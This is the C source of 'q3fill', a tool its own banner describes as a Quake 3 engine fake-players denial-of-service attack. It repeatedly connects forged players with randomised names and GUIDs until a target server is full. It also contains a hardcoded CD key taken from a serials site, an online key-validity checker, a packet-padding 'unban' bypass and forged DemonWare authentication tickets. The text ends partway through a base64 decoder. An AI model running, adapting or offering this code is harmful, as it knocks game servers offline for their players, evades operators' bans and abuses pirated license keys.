/*
    Copyright 2004,2005,2006,2007,2008,2009 Luigi Auriemma

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA

    http://www.gnu.org/licenses/gpl-2.0.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <time.h>
#include <ctype.h>
#include "des.h"
#include "q3huff.h"
#include "q3_guid.h"

#ifdef WIN32
    #include <winsock.h>
    #include <io.h>
    #include "winerr.h"

    #define close       closesocket
    #define sleep       Sleep
    #define usleep      sleep
    #define ONESEC      1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC      1
    #define stristr     strcasestr
    #define stricmp     strcasecmp
    #define strnicmp    strncasecmp
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;
typedef uint64_t    u64;



#define VER         "0.4.4e"
#define BUFFSZ      8192
#define MAX_INFO_STRING     1024
#define MORESZ      MAX_INFO_STRING
#define INFO        "\xff\xff\xff\xff" "getinfo xxx\n"
#define GETCH       "\xff\xff\xff\xff" "getchallenge\n"
#define Q3INI       "q3fill.ini"
#define AUTHSERVER  "authorize.quake3arena.com"
#define AUTHPORT    27952
#define KEYAUTH     "\xff\xff\xff\xff" "getKeyAuthorize 0 %s"
#define CDKEYDEF    "d3lsww2clsacjgpc"  // found on a serialz site



typedef struct {
    int     protocol;
    int     punkbuster;
    int     punkbuster2;
    int     password;
    int     compression;
    int     snaps;
    int     rate;
    int     internet;
    u8      *cdkey;
    u8      *mod;
    u8      *guid;
    u8      *pbguid;
} client_t;
int     sendrecv_tries  = 3;    // blah stupid CoD2



u8 *get_main_path(u8 *fname, u8 *argv0);
u8 *correct_user_parameters(u8 *mod);
#define scpy(a,b)   sprintf(a, "%.*s", sizeof(a) - 1, b);
void q3info(struct sockaddr_in *peer, client_t *client);
u8 *show_print_msg(u8 *data);
int get_new_parameters(u8 *data, u8 *more, int *snaps, int *rate);
void fgetz(u8 *buff, int size, FILE *fd);
int sendrecv(int sd, struct sockaddr_in *peer, u8 *in, int insz, u8 *out, int outsz);
void q3key2guid(u8 *dst, u8 *cdkey);
void check_it_online(u8 *key, u8 *authserver, u16 authport);
int build_connect(u8 *buff, int q3unban, u8 *pb2, ...);
int handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...);
int rnds(u8 *data, int len, u32 *seed);
void rndh(u8 *data, int len, u32 *seed, int ccase);
extern void tiger(u8 *, u64, u8 *);
void demonware_bdcrypto_prepare(u8 **key8, u8 **key16);
u8 *demonware_bdcrypto_encrypt(u32 rnd, u8 *key8, u8 *key16);
u8 *base64_encode(u8 *data, int *size);
u8 *base64_decode(u8 *data, int *size);
void pbhelp(void);
void authhelp(void);
int timeout(int sock);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    client_t    client;
    struct  sockaddr_in peer,
                        peerl;
    FILE    *fdnicks        = NULL;
    u32     seed;
    int     sd,
            i,
            len,
            challenge,
            autounban       = 0,
            timewait        = 4,
            dropclguid      = 0,
            verbose         = 0,
            verbose2        = 0,
            onefake         = 0,
            wait_a_fake     = 0,
            changed_comp    = 0;
    u16     port,
            authport        = AUTHPORT;
    u8      buff[BUFFSZ+1],
            more[MORESZ+1]  = "",
            password[64]    = "",
            *authserver     = AUTHSERVER,
            *fname          = NULL,
            *nick           = NULL,
            *bdTicket       = NULL,
            *demonware_hash = NULL,
            *demonware_key8 = NULL,
            *demonware_key16= NULL,
            *p4             = buff + 4,
            *host;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Quake 3 engine fake players DoS "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s [options] <server> <port>\n"
            "\n"
            "Options:\n"
            "-n       use the player names located in the file "Q3INI" (default random)\n"
            "-B G P   support for \"Enemy Territory 2.60 + PB\" servers, use -B ? for help\n"
            "-m PAR   adds custom parameters to the connect command, so if you want to use\n"
            "         the tool versus a RocketArena server try: -m \"\\cg_version\\1.7 6\"\n"
            "         format: \"par1\\val1\\par2\\val2...parN\\valN\"\n"
            "-g       disable cl_guid (very important with games which don't use it)\n"
            "-A ?     show the help for the authorization options\n"
            "-d HASH  demonware experimental option, DW can be the original cdkey of the\n"
            "         server, or its tiger hash or the last 16 bytes of the hash or the\n"
            "         base64 encoded version of that part of the hash\n"
            "\n"
            "Compatibility options:\n"
            "-c       do not compress the \"connect\" packet (automatic)\n"
            "-b       the punkbuster value will be forced to 1/enabled (automatic)\n"
            "-t SEC   time to wait to check if the server is still full and attack it (%d)\n"
            "-v       visualize the built connect packet and info about its compression\n"
            "-V       visualize any reply of the server after the \"connect\" packet\n"
            "-u       force the q3unban proof-of-concept (automatic)\n"
            "-1       one fake player only, only for testing/debugging\n"
            "-T SEC   specify the seconds to wait between each fake player\n"
            "-w PWD   forces the usage of the password PWD\n"
            "\n",
            argv[0], timewait);
        exit(1);
    }

    client.protocol     = 0;
    client.punkbuster   = 0;
    client.punkbuster2  = 0;
    client.password     = 0;
    client.compression  = 1;
    client.snaps        = 10;
    client.rate         = 1500;
    client.internet     = 0;
    client.cdkey        = CDKEYDEF;
    client.mod          = "";
    client.guid         = malloc(33);
    client.guid[0]      = 0;
    client.pbguid       = NULL; // malloc(33)
    //client.pbguid[0]    = 0;

    argc -= 2;
    if(argv[argc][0] == '-') argc++;

    for(i = 1; i < argc; i++) {
        if(((argv[i][0] != '-') && (argv[i][0] != '/')) || (strlen(argv[i]) != 2)) {
            printf("\nError: recheck your options (%s is not valid)\n", argv[i]);
            exit(1);
        }
        switch(argv[i][1]) {
            case 'c': {
                client.compression  = 0;
                } break;
            case 't': {
                timewait            = atoi(argv[++i]);
                } break;
            case 'b': {
                client.punkbuster   = 1;
                } break;
            case 'B': {
                if((argv[i + 1][0] == '?') || !stricmp(argv[i + 1], "help")) pbhelp();
                client.punkbuster2  = 1;
                client.guid         = strdup(argv[++i]);
                client.pbguid       = strdup(argv[++i]);
                } break;
            case 'n': {
                fname = get_main_path(Q3INI, argv[0]);
                printf("- open file %s\n", fname);
                fdnicks = fopen(fname, "rb");
                if(!fdnicks) std_err();
                } break;
            case 'm': {
                client.mod          = argv[++i];
                } break;
            case 'g': {
                dropclguid          = 1;
                } break;
            case 'A': {
                authhelp();
                } break;
            case 'i': {
                client.internet     = 1;
                } break;
            case 'I': {
                client.internet     = 2;
                } break;
            case 'a': {
                i++;
                authserver = strchr(argv[i], ':');
                if(authserver) {
                    *authserver = 0;
                    authport = atoi(authserver + 1);
                }
                authserver = argv[i];
                } break;
            case 'k': {
                client.cdkey        = argv[++i];
                } break;
            case 'v': {
                verbose             = 1;
                } break;
            case 'V': {
                verbose2            = 1;
                } break;
            case 'u': {
                autounban           = 1;
                } break;
            case '1': {
                onefake             = 1;
                } break;
            case 'T': {
                wait_a_fake         = atoi(argv[++i]);
                } break;
            case 'w': {
                sprintf(password, "%.*s", sizeof(password), argv[++i]);
                } break;
            case 'd': {
                demonware_hash      = argv[++i];
                } break;
            default: {
                printf("\nError: wrong command-line argument (%s)\n\n", argv[i]);
                exit(1);
            }
        }
    }
    if(!argv[argc + 1]) exit(1);    // useless work-around

    host = argv[argc];
    port = atoi(argv[argc + 1]);
    seed = time(NULL);

    if(client.internet == 2) {
        check_it_online(client.cdkey, authserver, authport);
        return(0);
    }

    peer.sin_addr.s_addr  = resolv(host);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    peerl.sin_addr.s_addr = INADDR_ANY;
    peerl.sin_port        = seed;
    peerl.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    q3info(&peer, &client);

    if(client.internet) {
        q3key2guid(client.guid, client.cdkey);
        check_it_online(client.cdkey, authserver, authport);
    }

    if(client.mod) client.mod = correct_user_parameters(client.mod);

    printf("\n- Fake players:\n");
    for(;;) {
        printf("\n     Player: ");

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
        do {
            peerl.sin_port++;
        } while(bind(sd, (struct sockaddr *)&peerl, sizeof(peerl)) < 0);

        sendrecv_tries = 10;    // only for CoD2
        len = sendrecv(sd, &peer, GETCH, sizeof(GETCH) - 1, buff, BUFFSZ);
        if(len < 0) std_err();
        sendrecv_tries = 3;

        if(strstr(p4, "AUTH")) {
            printf("\n"
                "Error: %s\n"
                "This error means you must send your CDKEY to the authorization server of the\n"
                "game running on the remote server.\n"
                "This tool is based only on the authorization protocol of Quake 3\n"
                "Retry again for some times and then if you are testing a Quake 3 server, try\n"
                "using the -i flag\n"
                "\n", show_print_msg(p4));
            exit(1);
        } else if(!stristr(p4, "challengeResponse")) {
            printf("\n"
                "Error: %s\n"
                "An error at this point means that you cannot join the server due to\n"
                "authorization problems (-A could help in some rare cases since each game uses\n"
                "its own cdkey authentication protocol)\n"
                "\n", show_print_msg(p4));
            exit(1);
        }

        challenge = atoi(buff + 22);
        if(bdTicket) free(bdTicket);
        bdTicket = strchr(buff + 22, ' ');
        if(bdTicket) {
            if(!demonware_hash) {
                printf("\n"
                    "Error: you don't have specified the demonware hash of the server with the -d\n"
                    "       option, remember that this feature is experimental\n");
                exit(1);
            }
            demonware_key8  = bdTicket + 1;
            demonware_key16 = demonware_hash;
            demonware_bdcrypto_prepare(&demonware_key8, &demonware_key16);
            bdTicket = demonware_bdcrypto_encrypt(seed, demonware_key8, demonware_key16);
            free(demonware_key8);
            free(demonware_key16);
        }

        if(!client.internet && !client.punkbuster2) {
            rndh(client.guid, 32, &seed, 1);
        }
        if(!client.punkbuster2) {
            if(client.pbguid) rndh(client.pbguid, 32, &seed, 0);
        }

        if(nick) free(nick);
        if(fdnicks) {
            fgetz(buff, BUFFSZ, fdnicks);
        } else {
            rnds(buff, 16, &seed);
        }
        nick = strdup(buff);
        printf(" \"%s\" ", nick);

        len = build_connect(
            buff,
            autounban,
            client.pbguid,
            "challenge",        "%i",   challenge,
            "qport",            "%i",   ntohs(peerl.sin_port),
            "protocol",         "%i",   client.protocol,
            "cl_guid",          (!dropclguid)     ? "%s" : NULL,    client.guid,
            "cl_punkbuster",    client.punkbuster ? "%i" : NULL,    client.punkbuster,
            //"cl_anonymous",     "%i",   0,
            "snaps",            "%i",   client.snaps,
            "rate",             "%i",   client.rate,
            "name",             "%s",   nick,
            "model",            "%s",   "none",
            "password",         "%s",   password,
            "g_password",       "%s",   password,
            "bdTicket",         bdTicket ? "%s" : NULL, bdTicket,
            "bdTicketTime",     bdTicket ? "%i" : NULL, 0x7fffffff, //time(NULL),
            NULL,               "%s",   client.mod,
            NULL,               "%s",   more,
            NULL,               NULL,   NULL);

        if(verbose) printf("\n%s\n", buff);
        if(client.compression) {
            if(verbose) printf("- compressed %d bytes to ", len);
            len = Huff_CompressPacket(buff, 12, len);
            if(verbose) printf("%d\n", len);
        }

        len = sendrecv(sd, &peer, buff, len, buff, BUFFSZ);
        if(len < 0) std_err();
        while(stristr(p4, "challengeResponse")) {
            len = sendrecv(sd, &peer, NULL, 0, buff, BUFFSZ);
            if(len < 0) std_err();
        }
        close(sd);

        if(verbose2) printf("\n%s\n", p4);
        if(stristr(p4, "full")) {
            for(i = timewait; i; i--) {
                printf("\r%4d", i);
                sleep(ONESEC);
            }

        } else if(stristr(p4, "password")) {
            printf("\n- server is protected, insert the required password:\n  ");
            fgetz(password, sizeof(password), stdin);

        } else if(stristr(p4, "connections") || stristr(p4, "players")) {
            printf(" %s", show_print_msg(p4));
            for(i = timewait; i; i--) {
                printf("\r%4d", i);
                sleep(ONESEC);
            }

        } else if(stristr(p4, "invalid") || stristr(p4, "detect")) {
            if(!dropclguid) {
                dropclguid = 1;
                printf("\n- I try to disable cl_guid\n");
            } else {
                printf("\n"
                    "- the server seems to use some checks over the \"connect\" packet so you need\n"
                    "  to use the -m option to look closer to a valid client of this specific game.\n"
                    "  For example in Jedi Knight 2 is possible to try with:\n"
                    "    -g -m \"\\forcepowers\\1-1-010000000000000000\\cg_predictItems\\1\\color1\\3\"\n"
                    "  while for the other games is required to dump the \"connect\" string of a\n"
                    "  valid client and placing the needed parameters checked by the game server in\n"
                    "  the -m string.\n"
                    "  Doing this is a joke since is possible to use my \"Quake 3 testing server\" tool\n"
                    "  or sniffing the packet and uncompressing using my q3huffdecenc tool\n");
                exit(1);
            }

        } else if(stristr(p4, "banned") && !autounban) {
            autounban = 1;
            printf("\n- autounban activated\n");

        } else if(stristr(p4, "ping") && !dropclguid) {
            dropclguid = 1;
            printf("\n- I try to disable cl_guid\n");

        } else if(!stristr(p4, "connectResponse")) {
            if(stristr(p4, "protocol")) {
                printf("\nError: %s\n", show_print_msg(p4));
                if(!dropclguid) {
                    dropclguid = 1;
                    printf("\n- I try to disable cl_guid\n");
                } else {
                    if(client.compression) {
                        printf("This error means you must disable compression (-c flag)\n");
                    } else {
                        printf("This error means you must enable compression (do not use the -c flag)\n");
                    }
                    exit(1);
                }
            } else if(get_new_parameters(p4, more, &client.snaps, &client.rate) < 0) {
                printf("\nError: The following is the answer from the server:\n%s\n\n", show_print_msg(p4));
                if(changed_comp) exit(1);
                changed_comp = 1;
                client.compression = client.compression ? 0 : 1;
                printf("- now I try %s the compression\n", client.compression ? "enabling" : "disabling");
            }

        } else {    // all ok
            if(onefake) {
                printf("\n- done\n");
                break;
            }

            for(i = wait_a_fake; i; i--) {
                printf("\r%4d", i);
                sleep(ONESEC);
            }
        }
    }

    return(0);
}



u8 *get_main_path(u8 *fname, u8 *argv0) {
    static u8   fullname[2000];
    u8      *p;

#ifdef WIN32
    GetModuleFileName(NULL, fullname, sizeof(fullname));
#else
    sprintf(fullname, "%.*s", sizeof(fullname), argv0);
#endif

    p = strrchr(fullname, '\\');
    if(!p) p = strrchr(fullname, '/');
    if(!p) p = fullname - 1;
    sprintf(p + 1, "%.*s", sizeof(fullname) - (p - fullname), fname);
    return(fullname);
}



u8 *correct_user_parameters(u8 *mod) {
    int     len;

    if(!mod[0]) return(mod);
    while(mod[0] == '\\') mod++;

    len = strlen(mod);
    for(len--; len >= 0; len--) {
        if(mod[len] != '\\') {
            mod[len + 1] = '\0';
            break;
        }
    }

    return(mod);
}



void q3info(struct sockaddr_in *peer, client_t *client) {
    int     sd,
            len;
    u8      buff[BUFFSZ],
            *pb,
            *proto,
            *pwd;

    printf("- retrieve informations\n");
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    len = sendrecv(sd, peer, INFO, sizeof(INFO) - 1, buff, BUFFSZ);
    if(len < 0) std_err();
    close(sd);

    fputc('\n', stdout);
    handle_info(buff, len, 1, '\\', 4, 0,
        "sv_punkbuster", &pb,
        "punkbuster",    &pb,
        "pb",            &pb,
        "protocol",      &proto,
        "needpass",      &pwd,
        "pswrd",         &pwd,
        NULL, NULL);

    if(pb)    client->punkbuster = atoi(pb);
    if(proto) client->protocol   = atoi(proto);
    if(pwd)   client->password   = atoi(pwd);

    printf("\n"
        "- parameters in use:\n"
        "  compression   %s\n"
        "  protocol      %d\n"
        "  punkbuster    %s\n"
        "  password      %s\n"
        "  key/guid      %s\n",
        client->compression ? "on" : "off",
        client->protocol,
        client->punkbuster  ? "on" : "off",
        client->password    ? "on" : "off",
        client->internet ? (char *)client->cdkey : "random");

    if(client->punkbuster2) {
        printf(
            "  guid          %s\n"
            "  pb_guid       %s\n",
            client->guid,
            client->pbguid);
    }
}



u8 *show_print_msg(u8 *data) {
    u8     *p;

    p = data + strlen(data) - 1;
    while((p >= data) && (*p <= '\r')) p--;
    *(p + 1) = 0;

    if(!strnicmp(data, "print\n", 6)) return(data + 6);
    return(data);
}



int get_new_parameters(u8 *data, u8 *more, int *snaps, int *rate) { // untouched function
    u8      *par,
            *val,
            *p;

    p = (u8 *)stristr(data, "your");
    if(!p) return(-1);

    printf("\n- %s\n", show_print_msg(data));

    while(*p && (*p != ' ') && (*p != '\t')) p++;       // skip word
    while(*p && ((*p == ' ') || (*p == '\t'))) p++;     // skip spaces

    par = p;                                            // parameter, for example snaps

    while(*p && (*p != ' ') && (*p != '\t')) p++;
    *p = 0;

    data = p + 1;

    p = strchr(data, ':');
    if(!p) {
        p = data + strlen(data) - 1;
        while((p >= data) && (*p != ' ') && (*p != '\t')) p--;
    }

    for(p++; *p && ((*p == ' ') || (*p == '\t')); p++); // skip spaces

    val = p;                                            // value requested by the server

    while(*p && (*p != ' ') && (*p != '\t') && (*p != '.')) p++;
    *p = 0;

    printf("- par\\val: \"%s\" \"%s\"\n", par, val);

    if(!stricmp(par, "snaps")) {
        *snaps = atoi(val);
    } else if(!stricmp(par, "rate")) {
        *rate = atoi(val);
    } else {
        p = more + strlen(more);
        if(((p - more) + 1 + strlen(par) + 1 + strlen(val)) >= MORESZ) {
            printf("\nError: the more buffer can't contain all the data\n");
            exit(1);
        }
        sprintf(p, "\\%s\\%s", par, val);
    }

    return(0);
}



int sendrecv(int sd, struct sockaddr_in *peer, u8 *in, int insz, u8 *out, int outsz) {
    int     i;

    if(in) {
        for(i = sendrecv_tries; i; i--) {
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) return(-1);
            fputc('.', stdout);
            if(!timeout(sd)) break;
        }
        if(!i) {
            printf("\nError: socket timeout, no reply received\n\n");
            exit(1);
        }
    }
    outsz = recvfrom(sd, out, outsz, 0, NULL, NULL);
    fputc('.', stdout);
    if(outsz >= 0) out[outsz] = 0;
    return(outsz);
}



void q3key2guid(u8 *dst, u8 *key) {
    md5_context md5t;
    int     i,
            len;
    u8      md5h[16],
            *tmp;
    static const char
            hex[16] = "0123456789ABCDEF";   // high case

    len = strlen(key);

    tmp = malloc(len);
    for(i = 0; i < len; i++) {  // all to high case and copy
        tmp[i] = toupper(key[i]);
    }

    q3_md5_init(&md5t);
    md5_update(&md5t, tmp, len);
    md5_finish(&md5t, md5h);

    free(tmp);

    for(i = 0; i < 16; i++) {
        *dst++ = hex[md5h[i] >> 4];
        *dst++ = hex[md5h[i] & 15];
    }
    *dst = 0;
}



int build_connect(u8 *buff, int q3unban, u8 *pb2, ...) {
    va_list ap;
    int     i,
            len,
            tmp,
            args,
            max_info_length;
    u8      **parz,
            **fmtz,
            **valz;

    va_start(ap, pb2);
    for(i = 0; ; i++) {
        tmp = 0;
        if(!va_arg(ap, u8 *)) tmp++;
        if(!va_arg(ap, u8 *)) tmp++;
        if(!va_arg(ap, u8 *)) tmp++;
        if(tmp >= 3) break;
    }
    va_end(ap);

    args = i;
    parz = malloc(args * sizeof(u8 *));
    fmtz = malloc(args * sizeof(u8 *));
    valz = malloc(args * sizeof(u8 *));

    va_start(ap, pb2);
    for(i = 0; i < args; i++) {
        parz[i] = va_arg(ap, u8 *);
        fmtz[i] = va_arg(ap, u8 *);
        valz[i] = va_arg(ap, u8 *);
    }
    va_end(ap);

    len = 0;
    len += sprintf(buff + len, "\xff\xff\xff\xff" "connect " "\"");
    for(i = 0; i < args; i++) {
        if(parz[i]) {
            if(!fmtz[i]) continue;
            if(strchr(fmtz[i], 's') && (!valz[i] || !valz[i][0])) continue;
            len += sprintf(buff + len, "\\%s\\", parz[i]);
        } else {
            if(strchr(fmtz[i], 's') && valz[i] && valz[i][0]) buff[len++] = '\\';
        }
        len += sprintf(buff + len, fmtz[i], valz[i]);
    }
    if(q3unban) {
        max_info_length = MAX_INFO_STRING - (len - 12);
        if(max_info_length > 0) {
            memset(buff + len, 'A', max_info_length);
            buff[len] = '\\';
            buff[len + (max_info_length / 2)] = '\\';
            len += max_info_length;
        }
    }
    if(pb2) {
        len += sprintf(buff + len, "\"" " *%s", pb2);
    } else {
        len += sprintf(buff + len, "\"");
    }

    free(parz);
    free(valz);
    return(len);
}



int handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...) {
    va_list ap;
    int     i,
            args,
            found;
    u8      **parz,
            ***valz,
            *p,
            *limit,
            *par,
            *val;

    va_start(ap, rear);
    for(i = 0; ; i++) {
        if(!va_arg(ap, u8 *))  break;
        if(!va_arg(ap, u8 **)) break;
    }
    va_end(ap);

    args = i;
    parz = malloc(args * sizeof(u8 *));
    valz = malloc(args * sizeof(u8 **));

    va_start(ap, rear);
    for(i = 0; i < args; i++) {
        parz[i]  = va_arg(ap, u8 *);
        valz[i]  = va_arg(ap, u8 **);
        *valz[i] = NULL;
    }
    va_end(ap);

    found  = 0;
    limit  = data + datalen - rear;
    *limit = 0;
    data   += front;
    par    = NULL;
    val    = NULL;

    for(p = data; (data < limit) && p; data = p + 1, nt++) {
        p = strchr(data, chr);
        if(p) *p = 0;

        if(nt & 1) {
            if(!par) continue;
            val = data;
            printf("  %30s %s\n", par, val);

            for(i = 0; i < args; i++) {
                if(!stricmp(par, parz[i])) *valz[i] = val;
            }
        } else {
            par = data;
        }
    }

    free(parz);
    free(valz);
    return(found);
}



void fgetz(u8 *buff, int size, FILE *fd) {
    u8      *p;

    if(!fgets(buff, size, fd)) {
        rewind(fd);
        if(!fgets(buff, size, fd)) std_err();
    }
    for(p = buff; *p && (*p != '\n') && (*p != '\r'); p++);
    *p = 0;
}



void check_it_online(u8 *key, u8 *authserver, u16 authport) {
    struct  sockaddr_in peer;
    int     sd,
            len;
    u8      buff[256];

    printf(
        "- check the key/guid %s online\n"
        "- server %s:%hu\n",
        key,
        authserver, authport);

    peer.sin_addr.s_addr = resolv(authserver);
    peer.sin_port        = htons(authport);
    peer.sin_family      = AF_INET;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    len = sprintf(buff, KEYAUTH, key);
    if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))
      < 0) std_err();

    if(timeout(sd) < 0) {       /* timeout = OK!!! */
        printf("- Excellent, the key %s seems valid for online game!\n", key);
    } else {
        len = recvfrom(sd, buff, sizeof(buff) - 1, 0, NULL, NULL);
        if(len < 0) std_err();
        buff[len] = 0;
        printf("\n"
            "Error: key doesn't seem valid for online game\n"
            "Check the log from the authorization server:\n"
            "%s\n"
            "\n", buff + 4);
    }
    close(sd);
    return;
}



int rnds(u8 *data, int len, u32 *seed) {
    u32     rnd = *seed;
    u8      *p = data;
    static const char
            table[] =
                "0123456789"
                "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz";

    len = rnd % len;
    if(len < 3) len++;

    while(len--) {
        rnd = ((rnd * 0x343FD) + 0x269EC3) >> 3;
        *p++ = table[rnd % (sizeof(table) - 1)];
    }
    *p = 0;

    *seed = rnd;
    return(p - data);
}



void rndh(u8 *data, int len, u32 *seed, int ccase) {
    u32     rnd = *seed;
    u8      *p  = data,
            *hex_table;
    static const char
            hex_table1[16] = "0123456789ABCDEF",
            hex_table2[16] = "0123456789abcdef";

    hex_table = ccase ? (u8 *)hex_table1 : (u8 *)hex_table2;

    while(len--) {
        rnd = ((rnd * 0x343FD) + 0x269EC3) >> 3;
        *p++ = hex_table[rnd & 15];
    }
    *p = 0;

    *seed = rnd;
}



void quick_hex(u8 *msg, u8 *data, int len) {
    static const char hex[16] = "0123456789abcdef";
    int     i;

    fputs(msg, stdout);
    for(i = 0; i < len; i++) {
        fputc(hex[data[i] >> 4], stdout);
        fputc(hex[data[i] & 15], stdout);
    }
    fputc('\n', stdout);
}



void demonware_bdcrypto_prepare(u8 **key8, u8 **key16) {    // specific for q3fill
    static int first_time = 1;
    int     i,
            t,
            len;
    u8      *tmp;

    if(!key8 || !key16) return;

    len = strlen(*key8);
    *key8 = base64_decode(*key8, &len);

    len = strlen(*key16);
    if(strchr(*key16, '-') && (len == 24)) { // original cdkey
        tmp = malloc(24);
        tiger(*key16, len, tmp);
        memmove(tmp, tmp + 8, 16);
    } else if(len == 48) {  // full hex hash
        tmp = malloc(16);
        for(i = 0; i < 16; i++) {
            sscanf(*key16 + 16 + (i << 1), "%02x", &t);
            tmp[i] = t;
        }
    } else if(len == 32) {  // 16 hex hash
        tmp = malloc(16);
        for(i = 0; i < 16; i++) {
            sscanf(*key16 + (i << 1), "%02x", &t);
            tmp[i] = t;
        }
    //} else if(len == 32) {   // base64 of the entire key, I doubt that the master server provides this
        //tmp = base64_decode(*key16, &len);
        //memmove(tmp, tmp + 8, 16);
    } else if(len >= 24) {  // base64 of the 16 bytes hash
        tmp = base64_decode(*key16, &len);
    } else {                // original cdkey
        printf("\n"
            "Error: your server hash is too short, if you inserted directly the original\n"
            "       cdkey of the server remember to add a '-' each 4 chars like:\n"
            "       AAAA-BBBB-CCCC-DDDD-EEEE\n");
        exit(1);
    }
    *key16 = tmp;

    if(first_time) {
        printf("\n");
        quick_hex("- first part of the demonware server hash:\n",  *key8,  8);
        quick_hex("- second part of the demonware server hash:\n", *key16, 16);
        printf("\n");
        first_time = 0;
    }
}



int putxx(u8 *data, u64 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = num >> (i << 3);
    }
    return(bytes);
}



u8 *demonware_bdcrypto_encrypt(u32 rnd, u8 *key8, u8 *key16) {  // rnd is a randomic value, key is base64
    des3_context    ctx;
    u64     userid,
            licenseid;
    u32     iv;
    int     len;
    u8      tmp[4 + 0x80],
            client_hash[24],
            server_hash[24],
            license_type,
            *p;

    iv = rnd;
    license_type = rnd * 0x1234; // something pseudo random
    userid       = (u64)rnd * 0x12345678LL; // something pseudo random
    licenseid    = (u64)rnd * 0x123456789abcdefLL; // something pseudo random

    p = tmp;
    p += putxx(p, iv,               32);    // iv
    p += putxx(p, 0xefbdadde,       32);    // challenge
    p += putxx(p, license_type,     8);     // license_type
    p += putxx(p, 0,                64);    // unused
    p += putxx(p, 0xffffffff,       32);    // timestamp
    p += putxx(p, userid,           64);    // userid
    p += putxx(p, licenseid,        64);    // licenseid
    while((p - (tmp + 4)) & 7) *p++ = 0;    // 3des padding

    tiger(tmp, 4, client_hash);
    memcpy(server_hash,     key8,  8);
    memcpy(server_hash + 8, key16, 16);
    des3_set3key_enc(&ctx, server_hash);
    len = p - tmp;
    des3_crypt_cbc(&ctx, DES_ENCRYPT, len - 4, client_hash, tmp + 4, tmp + 4);
    return(base64_encode(tmp, &len));
}



u8 *base64_encode(u8 *data, int *size) {
    int     len,
            a,
            b,
            c;
    u8      *buff,
            *p;
    static const u8 base[64] = {
        'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
        'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
        'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
        'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
    };

    if(!size || (*size < 0)) {      // use size -1 for auto text size!
        len = strlen(data);
    } else {
        len = *size;
    }
    buff = malloc(((len / 3) << 2) + 6);
    if(!buff) return(NULL);

    p = buff;
    do {
        a = data[0];
        b = data[1];
        c = data[2];
        *p++ = base[(a >> 2) & 63];
        *p++ = base[(((a &  3) << 4) | ((b >> 4) & 15)) & 63];
        *p++ = base[(((b & 15) << 2) | ((c >> 6) &  3)) & 63];
        *p++ = base[c & 63];
        data += 3;
        len  -= 3;
    } while(len > 0);
    *p = 0;

    for(; len < 0; len++) *(p + len) = '=';

    if(size) *size = p - buff;
    return(buff);
}



u8 *base64_decode(u8 *data, int *size) {
    int     len,
            xlen,
            a,
            b,
            c;
    u8      *buff,
            *limit,
            *p;
    static const u8 base[128] = {
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x3e, 0x00, 0x00, 0x00, 0x3f,
        0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b,
        0x3c, 0x3d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06,
        0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e,
        0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16,
        0x17, 0x18, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20,
        0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28,
        0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30,
        0x31, 0x32, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00
    };

    if(!size || (*size < 0)) {      // use size -1 for auto size!
        len = strlen(data);
    } else {
        len = *size;
    }
    xlen = ((len >> 2) * 3) + 1;    // NULL included in output for text
    buff = malloc(xlen);
    if(!buff) return(NULL);

    p = buff;
